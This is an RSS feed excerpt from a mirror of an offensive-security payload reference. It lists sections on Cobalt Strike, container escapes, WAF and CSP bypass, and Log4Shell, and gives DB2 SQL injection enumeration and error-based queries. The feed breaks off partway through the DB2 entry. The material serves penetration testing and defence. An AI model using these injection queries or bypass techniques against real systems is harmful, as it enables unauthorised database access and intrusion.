&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-services/"&gt;Azure Services&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Cobalt Strike</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/cobalt-strike-cheatsheet/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/cobalt-strike-cheatsheet/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/"&gt;InternalAllTheThings/command-control/cobalt-strike&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#infrastructure"&gt;Infrastructure&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#redirectors"&gt;Redirectors&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#domain-fronting"&gt;Domain fronting&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#opsec"&gt;OpSec&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#customer-id"&gt;Customer ID&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#payloads"&gt;Payloads&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#dns-beacon"&gt;DNS Beacon&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#smb-beacon"&gt;SMB Beacon&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#metasploit-compatibility"&gt;Metasploit compatibility&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#custom-payloads"&gt;Custom Payloads&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#malleable-c2"&gt;Malleable C2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#files"&gt;Files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#powershell-and-net"&gt;Powershell and .NET&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#powershell-commands"&gt;Powershell commabds&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#net-remote-execution"&gt;.NET remote execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#lateral-movement"&gt;Lateral Movement&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#vpn--pivots"&gt;VPN &amp;amp; Pivots&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#kits"&gt;Kits&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#elevate-kit"&gt;Elevate Kit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#persistence-kit"&gt;Persistence Kit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#resource-kit"&gt;Resource Kit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#artifact-kit"&gt;Artifact Kit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#mimikatz-kit"&gt;Mimikatz Kit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#sleep-mask-kit"&gt;Sleep Mask Kit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#thread-stack-spoofer"&gt;Thread Stack Spoofer&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#beacon-object-files"&gt;Beacon Object Files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#ntlm-relaying-via-cobalt-strike"&gt;NTLM Relaying via Cobalt Strike&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Common WAF Bypass</title><link>https://bokkapig.pages.dev/refs/payloads/xss-injection/3-xss-common-waf-bypass/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/xss-injection/3-xss-common-waf-bypass/</guid><description>&lt;blockquote&gt;
&lt;p&gt;WAFs are designed to filter out malicious content by inspecting incoming and outgoing traffic for patterns indicative of attacks. Despite their sophistication, WAFs often struggle to keep up with the diverse methods attackers use to obfuscate and modify their payloads to circumvent detection.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#cloudflare"&gt;Cloudflare&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#chrome-auditor"&gt;Chrome Auditor&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#incapsula-waf"&gt;Incapsula WAF&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#akamai-waf"&gt;Akamai WAF&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wordfence-waf"&gt;WordFence WAF&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#fortiweb-waf"&gt;Fortiweb WAF&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="cloudflare" class="anchored-heading"&gt;Cloudflare&lt;a class="heading-anchor" href="#cloudflare" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;25st January 2021 - &lt;a href="https://twitter.com/bohdansec"&gt;@Bohdan Korzhynskyi&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Container - Docker</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/container-docker-pentest/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/container-docker-pentest/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/"&gt;InternalAllTheThings/containers/docker&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#mounted-docker-socket"&gt;Mounted Docker Socket&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#open-docker-api-port"&gt;Open Docker API Port&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#insecure-docker-registry"&gt;Insecure Docker Registry&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#exploit-privileged-container-abusing-the-linux-cgroup-v1"&gt;Exploit privileged container abusing the Linux cgroup v1&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#abusing-capsysadmin-capability"&gt;Abusing CAP_SYS_ADMIN capability&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#abusing-coredumps-and-corepattern"&gt;Abusing coredumps and core_pattern&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#breaking-out-of-docker-via-runc"&gt;Breaking out of Docker via runC&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#breaking-out-of-containers-using-a-device-file"&gt;Breaking out of containers using a device file&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Container - Kubernetes</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/container-kubernetes-pentest/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/container-kubernetes-pentest/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/"&gt;InternalAllTheThings/containers/kubernetes/&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#exploits"&gt;Exploits&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#accessible-kubelet-on-10250tcp"&gt;Accessible kubelet on 10250/TCP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#obtaining-service-account-token"&gt;Obtaining Service Account Token&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>CSP Bypass</title><link>https://bokkapig.pages.dev/refs/payloads/xss-injection/4-csp-bypass/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/xss-injection/4-csp-bypass/</guid><description>&lt;blockquote&gt;
&lt;p&gt;A Content Security Policy (CSP) is a security feature that helps prevent cross-site scripting (XSS), data injection attacks, and other code-injection vulnerabilities in web applications. It works by specifying which sources of content (like scripts, styles, images, etc.) are allowed to load and execute on a webpage.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-csp-using-jsonp"&gt;Bypass CSP using JSONP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-csp-default-src"&gt;Bypass CSP default-src&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-csp-inline-eval"&gt;Bypass CSP inline eval&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-csp-unsafe-inline"&gt;Bypass CSP unsafe-inline&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-csp-script-src-self"&gt;Bypass CSP script-src self&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-csp-script-src-data"&gt;Bypass CSP script-src data&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-csp-nonce"&gt;Bypass CSP nonce&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-csp-header-sent-by-php"&gt;Bypass CSP header sent by PHP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#labs"&gt;Labs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://gmsgadget.com/"&gt;gmsgadget.com&lt;/a&gt; - GMSGadget (Give Me a Script Gadget) is a collection of JavaScript gadgets that can be used to bypass XSS mitigations such as Content Security Policy (CSP) and HTML sanitizers like DOMPurify.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csp-evaluator.withgoogle.com"&gt;csp-evaluator.withgoogle.com&lt;/a&gt; - CSP Evaluator allows developers and security experts to check if a Content Security Policy (CSP) serves as a strong mitigation against cross-site scripting attacks.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="bypass-csp-using-jsonp" class="anchored-heading"&gt;Bypass CSP using JSONP&lt;a class="heading-anchor" href="#bypass-csp-using-jsonp" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;</description></item><item><title>CVE-2021-44228 Log4Shell</title><link>https://bokkapig.pages.dev/refs/payloads/cve-exploits/log4shell/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/cve-exploits/log4shell/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Apache Log4j2 &amp;lt;=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#vulnerable-code"&gt;Vulnerable code&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#payloads"&gt;Payloads&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#scanning"&gt;Scanning&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#waf-bypass"&gt;WAF Bypass&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#exploitation"&gt;Exploitation&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#environment-variables-exfiltration"&gt;Environment variables exfiltration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#remote-command-execution"&gt;Remote Command Execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="vulnerable-code" class="anchored-heading"&gt;Vulnerable code&lt;a class="heading-anchor" href="#vulnerable-code" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;You can reproduce locally with: &lt;code&gt;docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app&lt;/code&gt; using &lt;a href="https://github.com/christophetd/log4shell-vulnerable-app"&gt;christophetd/log4shell-vulnerable-app&lt;/a&gt; or &lt;a href="https://github.com/leonjza/log4jpwn"&gt;leonjza/log4jpwn&lt;/a&gt;&lt;/p&gt;</description></item><item><title>DB2 Injection</title><link>https://bokkapig.pages.dev/refs/payloads/sql-injection/db2-injection/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/sql-injection/db2-injection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;IBM DB2 is a family of relational database management systems (RDBMS) developed by IBM. Originally created in the 1980s for mainframes, DB2 has evolved to support various platforms and workloads, including distributed systems, cloud environments, and hybrid deployments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#db2-comments"&gt;DB2 Comments&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#db2-default-databases"&gt;DB2 Default Databases&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#db2-enumeration"&gt;DB2 Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#db2-methodology"&gt;DB2 Methodology&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#db2-error-based"&gt;DB2 Error Based&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#db2-blind-based"&gt;DB2 Blind Based&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#db2-time-based"&gt;DB2 Time Based&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#db2-command-execution"&gt;DB2 Command Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#db2-waf-bypass"&gt;DB2 WAF Bypass&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#db2-accounts-and-privileges"&gt;DB2 Accounts and Privileges&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="db2-comments" class="anchored-heading"&gt;DB2 Comments&lt;a class="heading-anchor" href="#db2-comments" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Type&lt;/th&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;--&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;SQL comment&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="db2-default-databases" class="anchored-heading"&gt;DB2 Default Databases&lt;a class="heading-anchor" href="#db2-default-databases" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Name&lt;/th&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;SYSIBM&lt;/td&gt;
 &lt;td&gt;Core system catalog tables storing metadata for database objects.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;SYSCAT&lt;/td&gt;
 &lt;td&gt;User-friendly views for accessing metadata in the SYSIBM tables.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;SYSSTAT&lt;/td&gt;
 &lt;td&gt;Statistics tables used by the DB2 optimizer for query optimization.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;SYSPUBLIC&lt;/td&gt;
 &lt;td&gt;Metadata about objects available to all users (granted to PUBLIC).&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;SYSIBMADM&lt;/td&gt;
 &lt;td&gt;Administrative views for monitoring and managing the database system.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;SYSTOOLs&lt;/td&gt;
 &lt;td&gt;Tools, utilities, and auxiliary objects provided for database administration and troubleshooting.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="db2-enumeration" class="anchored-heading"&gt;DB2 Enumeration&lt;a class="heading-anchor" href="#db2-enumeration" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;th&gt;SQL Query&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;DBMS version&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select versionnumber, version_timestamp from sysibm.sysversions;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;DBMS version&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select service_level from table(sysproc.env_get_inst_info()) as instanceinfo&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;DBMS version&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select getvariable('sysibm.version') from sysibm.sysdummy1&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;DBMS version&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;DBMS version&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select service_level,bld_level from sysibmadm.env_inst_info&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Current user&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select user from sysibm.sysdummy1&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Current user&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select session_user from sysibm.sysdummy1&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Current user&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select system_user from sysibm.sysdummy1&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Current database&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select current server from sysibm.sysdummy1&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;OS info&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="db2-methodology" class="anchored-heading"&gt;DB2 Methodology&lt;a class="heading-anchor" href="#db2-methodology" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;th&gt;SQL Query&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;List databases&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT distinct(table_catalog) FROM sysibm.tables&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;List databases&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT schemaname FROM syscat.schemata;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;List columns&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT name, tbname, coltype FROM sysibm.syscolumns&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;List tables&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT table_name FROM sysibm.tables&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;List tables&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT name FROM sysibm.systables&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;List tables&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT tbname FROM sysibm.syscolumns WHERE name='username'&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="db2-error-based" class="anchored-heading"&gt;DB2 Error Based&lt;a class="heading-anchor" href="#db2-error-based" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;-- Returns all in one xml-formatted string
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;select&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;xmlagg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;xmlrow&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;table_schema&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;sysibm&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tables&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;-- Same but without repeated elements
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;select&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;xmlagg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;xmlrow&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;table_schema&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;select&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;distinct&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;table_schema&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;sysibm&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tables&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;-- Returns all in one xml-formatted string.
